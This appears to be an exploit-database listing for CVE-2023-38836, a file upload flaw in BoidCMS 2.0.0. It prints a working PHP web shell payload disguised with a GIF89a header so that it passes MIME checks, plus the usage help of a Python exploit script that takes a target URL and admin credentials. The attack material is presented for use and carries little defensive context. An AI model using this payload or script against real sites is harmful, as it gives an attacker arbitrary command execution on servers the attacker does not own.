Exploit for Unrestricted Upload of File with Dangerous Type in Boidcms CVE-2023-38836

Name: Exploit for Unrestricted Upload of File with Dangerous Type in Boidcms CVE-2023-38836
Rating: 5 (190 reviews)

2023-08-16 | CVSS 6.5

## https://sploitus.com/exploit?id=71FAB470-AB01-5B86-BE55-149570ADE147
# CVE-2023-38836 Exploit
File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
<br/>
To exploit, an attacker could add a GIF header to bypass MIME type checks.
```php
GIF89a;
<?php system($_GET["cmd"]); ?>
```

## Usage
```
usage: exp.py [-h] [-u URL] [-l USER] [-p PASSWD]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -l USER, --user USER  admin username
  -p PASSWD, --passwd PASSWD
                        admin password
```

![](img.png)